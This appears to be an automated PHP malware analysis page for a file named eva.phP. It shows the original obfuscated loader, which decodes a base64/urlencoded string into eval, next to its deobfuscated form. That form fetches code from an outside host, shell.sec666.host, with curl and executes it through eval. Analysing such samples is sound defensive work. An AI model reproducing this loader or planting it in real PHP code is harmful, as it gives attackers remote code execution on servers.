PHP Malware Analysis

Back to list

Filename: eva.phP

Tags

URLs
Execution
  • eval

Deobfuscated code

<?php

$X = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNEZhZGx5MzEzMzclMjklMjklMjklMjklMjklMjklMjklMjklM0I=";
$Fadly31337 = "==w6/8mVk7CrfCwBvV2yNnWqSeqrn+mbhOKmWqVnp1KVMoZkaVZ2EmsV0SNMRJdDzZ3C0LXCLIfDJ0gcPkICPEv8N4AcRddyQFNKvkcLO1y6GQ71QBCHDLypYoYAu8CyLP9MzYTTOtS0J3MSO/y1SbLKpkCKPDV0ssMzPnoyt4CSVB7VJLV5gjCyvE7sci3/2BQiBwJe/vGAUGw/mBQmB8fYA4ZA";
eval /* PHPDeobfuscator eval output */ {
    $o = curl_init('https://shell.sec666.host/sh3e3e3e3e3e3e3ellll');
    curl_setopt($o, CURLOPT_RETURNTRANSFER, 1);
    $i = curl_exec($o);
    eval('?>' . $i);
};
exit;


Original code

<?php $X = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNEZhZGx5MzEzMzclMjklMjklMjklMjklMjklMjklMjklMjklM0I="; $Fadly31337 = "==w6/8mVk7CrfCwBvV2yNnWqSeqrn+mbhOKmWqVnp1KVMoZkaVZ2EmsV0SNMRJdDzZ3C0LXCLIfDJ0gcPkICPEv8N4AcRddyQFNKvkcLO1y6GQ71QBCHDLypYoYAu8CyLP9MzYTTOtS0J3MSO/y1SbLKpkCKPDV0ssMzPnoyt4CSVB7VJLV5gjCyvE7sci3/2BQiBwJe/vGAUGw/mBQmB8fYA4ZA"; eval(htmlspecialchars_decode(urldecode(base64_decode($X)))); exit;?>